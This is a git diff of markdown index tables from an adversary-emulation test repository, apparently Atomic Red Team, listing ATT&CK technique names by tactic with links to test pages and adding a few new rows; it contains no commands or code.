+|  |  | [Time Providers](../../T1547.003/T1547.003.md) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Debugger Evasion](../../T1622/T1622.md) |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | [Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md) | [System Time Discovery](../../T1124/T1124.md) |  |  |  |  |  |
+|  |  | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indirect Command Execution](../../T1202/T1202.md) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Impair Defenses](../../T1562/T1562.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | [Forced Authentication](../../T1187/T1187.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading](../../T1036/T1036.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) | [Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md) | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | [Process Injection](../../T1055/T1055.md) | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Cloud Secrets Management Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | [Signed Binary Proxy Execution](../../T1218/T1218.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | [Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Reflective Code Loading](../../T1620/T1620.md) | [Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md) |  |  |  |  |  |  |
+|  |  | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Login Items](../../T1547.015/T1547.015.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) |  |  |  |  |  |  |
+|  |  | [Account Manipulation: Additional Cloud Credentials](../../T1098.001/T1098.001.md) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md) |  |  |  |  |  |  |
+|  |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md) | [OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Account Manipulation](../../T1098/T1098.md) | Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Compromise Host Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | [Kubernetes List Secrets](../../T1552.007/T1552.007.md) |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md) | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |
+|  |  | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Create Account: Cloud Account](../../T1136.003/T1136.003.md) | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) |  |  |  |  |  |  |  |
+|  |  | [Account Manipulation](../../T1098/T1098.md) | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | [Rogue Domain Controller](../../T1207/T1207.md) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Code Signing Policy Modification](../../T1553.006/T1553.006.md) |  |  |  |  |  |  |  |
+|  |  | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution](../../T1546/T1546.md) | [Deploy a container](../../T1610/T1610.md) |  |  |  |  |  |  |  |
+|  |  | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Modify Registry](../../T1112/T1112.md) |  |  |  |  |  |  |  |
+|  |  | ROMMONkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) | [Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md) |  |  |  |  |  |  |  |
+|  |  | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) |  |  |  |  |  |  |  |
+|  |  | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) |  |  |  |  |  |  |  |
+|  |  | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) |  |  |  |  |  |  |  |
+|  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) |  |  |  |  |  |  |  |
+|  |  | [IIS Components](../../T1505.004/T1505.004.md) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution](../../T1546/T1546.md) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Permissions Modification](../../T1222/T1222.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Authentication Package](../../T1547.002/T1547.002.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Create Process with Token](../../T1134.002/T1134.002.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md) | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) |  |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md) |  |  |  |  |  |  |  |
+|  |  | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Temporary Elevated Cloud Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [BITS Jobs](../../T1197/T1197.md) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Indicator Removal on Host](../../T1070/T1070.md) |  |  |  |  |  |  |  |
+|  |  | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) |  |  |  |  |  |  |  |
+|  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) |  |  |  |  |  |  |  |
+|  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) |  |  |  |  |  |  |  |
+|  |  | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | [Plist File Modification](../../T1647/T1647.md) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) |  |  |  |  |  |  |  |
+|  |  | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Build Image on Host](../../T1612/T1612.md) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Process Injection: Portable Executable Injection](../../T1055.002/T1055.002.md) |  |  |  |  |  |  |  |
+|  |  | [Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) | [Impair Defenses: Downgrade Attack](../../T1562.010/T1562.010.md) |  |  |  |  |  |  |  |
+|  |  | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md) |  |  |  |  |  |  |  |
+|  |  | [Office Application Startup: Office Test](../../T1137.002/T1137.002.md) | [Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md) | Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) |  | [Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md) |  |  |  |  |  |  |  |
+|  |  | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) |  | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) |  | LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | [Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md) |  |  |  |  |  |  |  |
+|  |  | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | [Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md) |  | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) |  |  |  |  |  |  |  |
 |  |  | SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  | Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -134,6 +136,7 @@
 |  |  |  |  | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Run Virtual Instance](../../T1564.006/T1564.006.md) |  |  |  |  |  |  |  |
+|  |  |  |  | Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Network Boundary Bridging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
@@ -155,11 +158,14 @@
 |  |  |  |  | Modify Cloud Compute Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [Impair Defenses: Disable Cloud Logs](../../T1562.008/T1562.008.md) |  |  |  |  |  |  |  |
 |  |  |  |  | [Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md) |  |  |  |  |  |  |  |
+|  |  |  |  | ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Relocate Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Create Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
+|  |  |  |  | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
 |  |  |  |  | [HTML Smuggling](../../T1027.006/T1027.006.md) |  |  |  |  |  |  |  |
 |  |  |  |  | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  |  |  |  |  |  |  |
diff --git a/atomics/Indexes/Matrices/windows-matrix.md b/atomics/Indexes/Matrices/windows-matrix.md
index 66673d798d..6ab595b62d 100644
--- a/atomics/Indexes/Matrices/windows-matrix.md
+++ b/atomics/Indexes/Matrices/windows-matrix.md
@@ -5,54 +5,55 @@
 | Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
